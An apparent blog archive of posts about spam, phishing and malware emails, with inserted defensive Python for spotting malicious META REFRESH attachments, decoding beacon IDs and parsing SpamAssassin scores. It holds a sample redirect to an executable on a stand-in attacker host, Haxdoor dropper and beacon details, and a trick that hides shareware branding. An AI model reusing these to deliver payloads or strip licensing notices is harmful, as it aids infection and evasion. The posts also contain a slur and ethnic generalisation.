Patrick Nortoni

September 25th, 2009

Sometimes, people just catch you on an off day, causing your usual cool exterior to crack and spew forth a torrent of vitriol and abuse.  Today wasn’t one of those days, but ‘Patrick Nortoni’ managed to annoy me a great deal by posting his default spam email nonsense into the contact form on one of my sites:

We would like to get your website on first page of Google. All of our processes use the most ethical “white hat” Search Engine Optimization techniques that will not get your website banned or penalized. Please reply and I would be happy to send you a proposal. In order for us to respond to your request for information, please include your company's website address (mandatory) and/or phone number.

Patrick Nortoni
patrick2316@gmail.com
SEO Company
000-000-0000


Sent at 21:36.21 on 22nd September 2009 from 122.160.99.22

Where to begin with this nonsense?  He sends me a non-personalised email through a mail form using a GMail address and doesn’t even bother to include a real phone number.  Hmm.. I wonder why that could be?  Let’s take a look at that IP address…


Now I’m sure that there are plenty of hard-working, honest IT workers in India, but I never seem to meet them. All I get are the spam emails for outsourcing my web design work or – in the case of Patrick Nortoni here – my SEO work.

A quick Google search for ‘Patrick Nortoni’ throws up comment spam. Lots of comment spam. Comment spam pimping his great SEO services on pages that have absolutely nothing to do with SEO. Presumably, these are his ‘most ethical “white hat” Search Engine Optimization techniques’. Whatever, I won’t be wasting my time with this fool, and neither should you.

Update:
It’s a funny old game. This post is now 2nd (up from 4th) on Google for ‘Patrick Nortoni’, and not a comment spam in sight.

Worldpay CARD Transaction Confirmation Spam/Virus

June 25th, 2009

This afternoon I received an email with the subject “Worldpay CARD transaction Confirmation”, which instantly caught my attention because I use Worldpay while paying off one of my credit cards, and for a moment I wondered if I had done it and forgotten about it.

The email content was as follows:

Thank you!

Your transaction has been processed by WorldPay, on behalf of Amazon Inc.

The invoice file is attached to this message.
This is not a tax receipt.
We processed your payment.
Amazon Inc has received your order,
and will inform you about delivery.
Sincerely,
Amazon Team

This confirmation only indicates that your transaction has been processed successfully.
It does not indicate that your order has been accepted.
It is the responsibility of Amazon Inc to confirm that your order has been accepted, and to deliver any goods or services you have ordered.

All very convincing and official-looking, but Amazon doesn’t use Worldpay, and the email was not sent to amazon@<my email domain> – it was sent to my office address which is only used for, well, office stuff.

The email attachment is a simple HTML file, so it is not flagged as anything dodgy, but it consists of a single META REFRESH line that redirects you to an executable file hosted elsewhere, so don’t open the attachment.
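The check a mail gateway or a cautious admin can run on such an attachment, as an added example that is not part of the original post: parse the HTML, pull out every META REFRESH target, and flag any that point at an executable. The attachment text and the host name in it are constructed stand-ins for the one described above.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Extensions that should never be the target of an auto-redirect in an "invoice"
# (assumption: a reasonable starting list, extend to taste)
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".msi"}


class MetaRefreshFinder(HTMLParser):
    """Collects the target URL of every <meta http-equiv="refresh"> tag."""

    def __init__(self):
        super().__init__()
        self.targets = []

    def handle_starttag(self, tag, attrs):
        if tag != "meta":
            return
        # HTMLParser lower-cases tag/attribute names; values may be None
        a = {k: (v or "") for k, v in attrs}
        if a.get("http-equiv", "").strip().lower() != "refresh":
            return
        # content looks like "0; url=http://host/file.exe" (case and spacing vary)
        m = re.search(r"url\s*=\s*['\"]?([^'\"\s;]+)", a.get("content", ""), re.I)
        if m:
            self.targets.append(m.group(1))


def refresh_targets(html_text):
    """All META REFRESH destinations in the document, in order."""
    p = MetaRefreshFinder()
    p.feed(html_text)
    p.close()
    return p.targets


def suspicious_redirects(html_text):
    """The META REFRESH destinations whose path ends in an executable extension."""
    hits = []
    for url in refresh_targets(html_text):
        path = urlsplit(url).path.lower()
        if any(path.endswith(ext) for ext in EXECUTABLE_EXTS):
            hits.append(url)
    return hits


# Constructed attachment modelled on the one in the post (placeholder host)
SAMPLE_ATTACHMENT = (
    '<HTML><HEAD><META HTTP-EQUIV="Refresh" '
    'CONTENT="0; URL=http://attacker.invalid/invoice.exe"></HEAD></HTML>'
)

if __name__ == "__main__":
    print(suspicious_redirects(SAMPLE_ATTACHMENT))
```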

‘Your internet access is going to get suspended’ Email

November 10th, 2008

If you receive an email with the subject ‘Your internet access is going to get suspended’ then don’t panic – it’s another virus doing the rounds that sends out these worryingly-phrased emails in an attempt to trick you into running the attachment and infecting yourself with the payload. Several sites have picked up on it and a few of the popular virus scanning packages have spotted it already.

The message reads:

Your internet access is going to get suspended

The Internet Service Provider Consorcium was made to protect the rights of
software authors, artists.  We conduct regular wiretapping on our networks,
to monitor criminal acts.

We are aware of your illegal activities on the internet wich were originating from

You can check the report of your activities in the past 6 month that we have
attached. We strongly advise you to stop your activities regarding the illegal
downloading of copyrighted material of your internet access will be suspended.

Sincerely
ICS Monitoring Team

The message contains a randomly-named zip file of the form user-XXXXXXXX-activities.zip; once extracted, the file inside is user-XXXXXXXX-activities.exe, where XXXXXXXX is a string of random characters.

The malware registers a Winlogon notification package so that the installed module is loaded into the address space of winlogon.exe. The files cabpck.dll (known as Mal/TinyDL-T by Sophos), k86.bin and krnlcab.sys (known as Backdoor:Win32/Haxdoor by Microsoft) are created in the %System% folder.

A directory %Temp%\msi_setup is created and a connection is made to a remote host: http://****-****.biz/jerken/data.php?trackid=706172616D3D6 or http://*****.net/22/data.php?trackid=706172616D3D636D64266C616E6
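The trackid values in those two beacon URLs are hex-encoded text, which is worth knowing when you are deciding what the infected machine is reporting home. The decoder below is an added example, not code from the post; it takes the two URLs exactly as quoted above (hosts redacted with asterisks as they appear there) and reports any dangling half-byte rather than silently dropping it, since both values were cut short mid-byte.

```python
from urllib.parse import parse_qs, urlsplit


def decode_trackid(url):
    """Hex-decode the trackid query parameter of a beacon URL.

    Returns (decoded_text, leftover_nibble).  Non-printable bytes are shown
    as '.' so the result is safe to drop into a log or ticket.
    """
    qs = parse_qs(urlsplit(url).query)
    hexval = qs.get("trackid", [""])[0]
    cut = len(hexval) - len(hexval) % 2          # longest even-length prefix
    even, leftover = hexval[:cut], hexval[cut:]
    raw = bytes.fromhex(even)
    text = "".join(chr(b) if 32 <= b < 127 else "." for b in raw)
    return text, leftover


# The two URLs quoted in the post, with the line-wrap spaces removed
BEACONS = [
    "http://****-****.biz/jerken/data.php?trackid=706172616D3D6",
    "http://*****.net/22/data.php?trackid=706172616D3D636D64266C616E6",
]

if __name__ == "__main__":
    for u in BEACONS:
        print(u, "->", decode_trackid(u))
```

Both decode to the start of a query string of their own ("param=" and "param=cmd&lan"), i.e. the beacon is passing its control parameters back to the host inside the hex blob.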

It makes a change from the usual ‘Please find your receipt attached’ approach, but my main concern is the number of clients who will instantly think they’ve done something wrong and go ahead and get infected.

Email Exchange of the Week

April 25th, 2007

By now, many of you will be well aware of my hatred for all things MySpace-related. Here’s a typical email exchange, illustrating just why I detest them…

    Subject: you are downloaded stuff to my computer without my permission
    i do not know why u r pop up on my screen but can u please tnot pop up

Sure, I can ‘tnot pop up’. Suspecting another d04.net scam, since the email had come in via the d04.net account, I wrote back:

    Hi,

    D04.net does not download anything to anyone’s computer. It is a simple web page. Please read about what d04.net is before emailing. Thanks.

    http://www.d04.net/

    What link did you click on to get to the website? What site did it link to? (should end in d04.net is it’s on our service).

    D

Of course, that didn’t actually make the writer stop and think…

    yes it does it putting nasty web sites on my comnputer thank i have alrwady report it to spam any way u do not know what u are talking about every time i trying to send someone a message a my space your web site po up why

Oh noes! I’ve been ‘alrwady report to spam’! I write back again…

    Please tell me what address is at the top of the page. Do you see a blue bar across the top with a ‘Report This Site’ button on it? If so, please click the button and I will know what site you are talking about.

    Please don’t tell me what my site does or doesn’t do – I wrote it. If you are not willing to answer the questions I ask, I can’t help you.

    D

But no, I was WRONG! I obviously DON’T know what my own website does…

    yes it does when i try to get on my space to send message to some one why do your web page come up u know i am going to report u to spam

Perhaps my web page comes up because.. I dunno.. you’re not looking at MySpace anymore or something equally impossible? Honestly, I couldn’t be bothered to write back after this because it was only going to go downhill from here. Sheesh!

ImageShack Spam

April 4th, 2007

The war on Spam Filters continues with a new assault – images hosted on ImageShack. You receive an email with just a couple of lines of random text and a link to an ImageShack image. That’s your lot.

ImageShack themselves seem to be pretty quick about taking them down, possibly because others have already reported them, as I’ve never actually seen one working. This leads me to suspect spammers have become even more retarded than previously.

Personal SpamAssassin Spam Score Record Broken.

December 22nd, 2006

Holy shit. I wasn’t going to post so soon after yesterday’s but this is insane. I am running SpamAssassin on this server, which awards points to emails it considers spam based on various criteria. Bearing in mind the default (afaik – mine is anyway) cut off is 6 points, I was somewhat surprised to see a message that scored a whopping 49.8 points in my junk tray – a good five points over my previous record.

Here’s the summary – why the hell did the sender think this would ever get anywhere?


Spam detection software, running on the system "xxxxxxxxxxxxxx", has
identified this incoming email as possible spam.  The original message
has been attached to this so you can view it (if it isn't spam) or label
similar future email.  If you have any questions, see the administrator
of that system for details.
Content preview:  email advertise like this to 8,000,000 people... free..
  http://www.advertisingemailcorporation.com/ the above noncommercial
  offer is only for noncommercial charities only. press on charity info on
  our web site for full and complete details. this offer is not a
  commercial service and is not at all for sale or lease or trade of any
  kind. [...]
Content analysis details:   (49.8 points, 6.0 required)
 pts rule name              description
---- ---------------------- --------------------------------------------------
 2.4 MSGID_YAHOO_CAPS       Message-ID has ALLCAPS@yahoo.com
 4.5 MIME_BOUND_DD_DIGITS   Spam tool pattern in MIME boundary
 1.0 NO_REAL_NAME           From: does not include a real name
 1.5 FROM_BLANK_NAME        From: contains empty name
 2.2 HELO_DYNAMIC_SPLIT_IP  Relay HELO'd using suspicious hostname (Split
                            IP)
 4.4 MSGID_SPAM_CAPS        Spam tool Message-Id: (caps variant)
 0.0 UNPARSEABLE_RELAY      Informational: message has unparseable relay lines
 3.5 BAYES_99               BODY: Bayesian spam probability is 99 to 100%
                            [score: 1.0000]
 1.5 RAZOR2_CF_RANGE_E8_51_100 Razor2 gives engine 8 confidence level
                            above 50%
                            [cf: 100]
 1.5 RAZOR2_CF_RANGE_E4_51_100 Razor2 gives engine 4 confidence level
                            above 50%
                            [cf: 100]
 1.0 RAZOR2_CHECK           Listed in Razor2 (http://razor.sf.net/)
 0.5 RAZOR2_CF_RANGE_51_100 Razor2 gives confidence level above 50%
                            [cf: 100]
 2.2 DCC_CHECK              Listed in DCC (http://rhyolite.com/anti-spam/dcc/)
 3.9 RCVD_IN_XBL            RBL: Received via a relay in Spamhaus XBL
                            [83.45.130.42 listed in sbl-xbl.spamhaus.org]
 1.9 RCVD_IN_NJABL_DUL      RBL: NJABL: dialup sender did non-local SMTP
                            [83.45.130.42 listed in combined.njabl.org]
 3.7 RCVD_DOUBLE_IP_SPAM    Bulk email fingerprint (double IP) found
 1.8 MISSING_SUBJECT        Missing Subject: header
 0.8 DIGEST_MULTIPLE        Message hits more than one network digest check
 1.6 MISSING_MIMEOLE        Message has X-MSMail-Priority, but no X-MimeOLE
 2.1 REPTO_QUOTE_YAHOO      Yahoo! doesn't do quoting like this
 3.7 FORGED_MSGID_YAHOO     Message-ID is forged, (yahoo.com)
 4.1 FORGED_MUA_OUTLOOK     Forged mail pretending to be from MS Outlook
The original message was not completely plain text, and may be unsafe to open with
some email clients; in particular, it may contain a virus, or confirm that your address
can receive spam.  If you wish to view it, it may be safer to save it to a file and open
it with an editor.
--
No virus found in this incoming message.
Checked by AVG Free Edition.
Version: 7.5.432 / Virus Database: 268.15.25/593 - Release Date: 19/12/2006 13:17
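One thing worth pulling out of a report like this is how much of the score comes from network lookups (Spamhaus, NJABL, Razor, DCC) versus purely local header and body heuristics, because the local rules alone decide whether a message would still be caught if those lookups were unavailable. The parser below is an added example, not code from the post or from SpamAssassin; it reads the "Content analysis details" table format, folds the wrapped description lines back into their rule, and splits the total. The embedded report is a constructed excerpt of the one above (its header line and six of the 22 rule hits), so its total is lower than the header's 49.8; the prefixes used to spot network rules are an assumption based on the rule names on the page.

```python
import re

# Constructed excerpt of the report quoted above: header kept verbatim, six rule hits
REPORT = """\
Content analysis details:   (49.8 points, 6.0 required)
 pts rule name              description
---- ---------------------- --------------------------------------------------
 2.4 MSGID_YAHOO_CAPS       Message-ID has ALLCAPS@yahoo.com
 2.2 HELO_DYNAMIC_SPLIT_IP  Relay HELO'd using suspicious hostname (Split
                            IP)
 3.5 BAYES_99               BODY: Bayesian spam probability is 99 to 100%
                            [score: 1.0000]
 3.9 RCVD_IN_XBL            RBL: Received via a relay in Spamhaus XBL
                            [83.45.130.42 listed in sbl-xbl.spamhaus.org]
 0.0 UNPARSEABLE_RELAY      Informational: message has unparseable relay lines
 4.1 FORGED_MUA_OUTLOOK     Forged mail pretending to be from MS Outlook
"""

RULE_LINE = re.compile(r"^\s?(-?\d+\.\d+)\s+(\S+)\s+(.*)$")
HEADER = re.compile(r"\(([\d.]+) points, ([\d.]+) required\)")
# Rules whose verdict depends on a network lookup (assumption from the names on the page)
NETWORK_PREFIXES = ("RCVD_IN_", "RAZOR2_", "DCC_", "DIGEST_")


def parse_report(text):
    """Return (required_score, [(points, rule, description), ...]).

    Continuation lines (deeply indented) are appended to the previous rule's description.
    """
    required, hits = None, []
    for line in text.splitlines():
        m = HEADER.search(line)
        if m:
            required = float(m.group(2))
            continue
        m = RULE_LINE.match(line)
        if m:
            hits.append((float(m.group(1)), m.group(2), m.group(3).strip()))
        elif hits and line.startswith("    "):
            pts, rule, desc = hits[-1]
            hits[-1] = (pts, rule, desc + " " + line.strip())
    return required, hits


def score_breakdown(text):
    """Split the score into local-only and network-lookup contributions."""
    required, hits = parse_report(text)
    network = round(sum(p for p, r, _ in hits if r.startswith(NETWORK_PREFIXES)), 1)
    local = round(sum(p for p, r, _ in hits if not r.startswith(NETWORK_PREFIXES)), 1)
    return {"required": required, "local": local, "network": network,
            "total": round(local + network, 1),
            "spam_without_network": local >= required}


if __name__ == "__main__":
    print(score_breakdown(REPORT))
```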

Spam, Spammers and Blocklists, oh my!

December 5th, 2006

I’m getting heartily sick of the whole email/spam/rbl situation at the moment.

Our office IP was blocked because we sent out a mass email on behalf of a customer, and it’s proving a pain in the arse to get it off the block lists. Not only does it take weeks, but customers are apparently using RBLs that – according to DNSStuff at least – should not be used.

AOL decided to block email from our server because we had an insecure script on there at some point in the past. Rather than TELL us, they just blocked us and left it at that. Thanks, AOL! I’m now jumping through their hoops to try and get the ban lifted so that our clients can receive email directly (some of them insist on having their email forwarded to AOL, sigh…) rather than having me forward the bounces.

Customers don’t seem to appreciate how much spam/virus crap we’re dealing with these days. With SpamAssassin and MailScanner both running on the server I still receive around 30 a day that are slipping through. We have our spam filter level set at the default of 6 points and it catches the occasional legit email, so I dare not set it any lower.

And just today I had some stupid script kiddy hacker crap to put up with. Some pillock over at 222.121.133.34 (a Kornet IP) decided to script scan the server for default passwords, over and over again, from the same IP. Thanks, Korea! Jesus. I’ve sent them an email but I’m not holding out much hope.

Is it time to go home yet?

Latest Phishing Scam – Fake MySpace Login

August 11th, 2006

The Internet is full of very sad people. As if it wasn’t bad enough with phishing attempts to get bank account, PayPal or eBay details these people now have a new target – MySpace.

Over the last couple of days, pedwa2305@yahoo.com has tried to create fake MySpace login pages and used a Free Subdomain to try and fool users into giving up their details.

The login page itself is amateurish and unconvincing and has an advertising banner across the top of the page, but at least one person has emailed me (despite the domain being blocked, so all they see are d04-branded pages) asking to cancel her MySpace account.

Why MySpace? Is this a feeble attempt to hack a certain someone’s account or is it part of a much wider phishing attempt? I don’t care – the subdomains have been blocked and the account disabled. If anyone else creates one, the same will occur.

Spammers now using CAPTCHA-style detection-avoidance.

May 9th, 2006

What strange times we live in. I’ve noticed that more and more of the spam I’ve been receiving has a random image attached to it – just a piece of clipart or a photo of a puppy or something. Maybe this random image is filched from a compromised user’s hard drive and sent out to achieve some kind of email randomness in order to defeat Spam filters.

But over the last week I’ve had a new kind of Spam email. These have the email content rendered as an image, but in order to avoid sending out the same image every time, they’re now liberally scattered with yellow dots on the white background.

Many websites – for example Something Awful dot com – require that you study an image on the screen and enter the slightly distorted text from the image into a text box in order to log in to a restricted area – be it a forum or a control panel for example. The idea is that your average human will have no problem reading it, but a computer will struggle a bit – an interesting version of the Turing test designed to spot automated logins.

It seems that Spammers are now using a similar approach to avoid detection, with the (presumably) compromised machines taking the base Spam content as an image and sprinkling it with random data. The recipient doesn’t have any problem reading it but your Spam filter sees a unique image and doesn’t automatically know that it’s Spam, and so the message gets through and succeeds in annoying you for the fraction of a second longer that it takes to hit the Delete key.

Currently all the emails I have received have been the same black Helvetica/Arial text on a white background overlaid with the yellow randomness. How long before they start really following the examples of website CAPTCHA challenge-response logins and use random fonts, colours and backgrounds? Perhaps they’ll encounter the same problems, in that too much randomness can produce unreadable results. I doubt that will deter the Spammers though – they’ll simply continue sending out multiple junk messages.

Various Musings

April 20th, 2006

Various bits and bobs – general chunterings while having a break.

Fog on the Road!
A misty morning, guaranteed to get every nonce showing the world how wonderful their fog lights are. Great. I can see your car at least a hundred yards in front of me thanks to its car-shaped-ness, but put your fog lights on anyway – that’ll help!

Bulk Email Sender Hacking
OK so it’s not hacking as such, but I was playing about with a bulk email sender on the Mac and found that it didn’t check for strict HTML. Ordinarily it adds a TABLE to the bottom of all HTML emails containing something about using the unregistered version (cough!), and it does this by inserting a snippet of HTML just before the /BODY tag. If you do this:

    <DIV STYLE="visibility:hidden">
    </BODY>
    </HTML>
    </DIV>

at the end of your HTML email, this little bit of shareware branding gets hidden away.

Dinosaurs!
One of the recurring dreams I have is of being chased around the streets by a Tyrannosaurus Rex. I’ll hide in a room or an alleyway and it’ll appear outside the window or whatever, so I have to scurry off somewhere else. It never catches me, but I wake up rigid with fear. I’m 36 – why is this happening?

AOL Spam-Blocked – hahahah
Sweet, sweet justice. After revealing their Pay-to-Spam-Our-Users scheme recently, it was gratifying to see at least one AOL SMTP server cropping up on the BlockLists. It’s no longer on the SpamCop list which probably means it’s working in the majority of cases again, but it was nice while it lasted.

Googly Adsense
I managed to talk Foo into signing up to Google Adsense via my referral link (the big banner, here) and he’s already raking in the.. uh.. well a few cents here and there anyway. Presumably I get a tiny percentage for referring him as well.

The-Lottery.info
I added a chunk of code to The-Lottery.info last night to allow the owner to enter the prize breakdown for each draw and display it as part of the latest lottery results pages. After pondering it for, ooooh, a whole ten minutes, I eventually came up with a novel way of including default values for the various winning combinations. I thought it was groovy, anyway.

Reformat Time!
Gah! I fired up the old laptop today and after it wheezed to a halt into Windows the wireless internet refused to work no matter what. Since I started working in Scunthorpe the laptop has been a dumping ground for all kinds of software (including bulk email stuff, actually) and is generally a mess – time to scrub it up!

Barry McGuigan in Cleethorpes
Barry McGuigan is in Cleethorpes on Monday 24th April at Joe Frater’s boxing night – more details here. I’ll be in attendance as usual. Amir Khan is due at the Christmas show – that should be a good one.

Site redesign
I know I mentioned the DHTML Window Thing (see right) a while ago and how I was going to implement it, but I’ve been thinking of cutting right back on the graphics and going back to plain text instead. The main reasons for this are compatibility and search engine optimisation – all those tables and shit just get in the way really.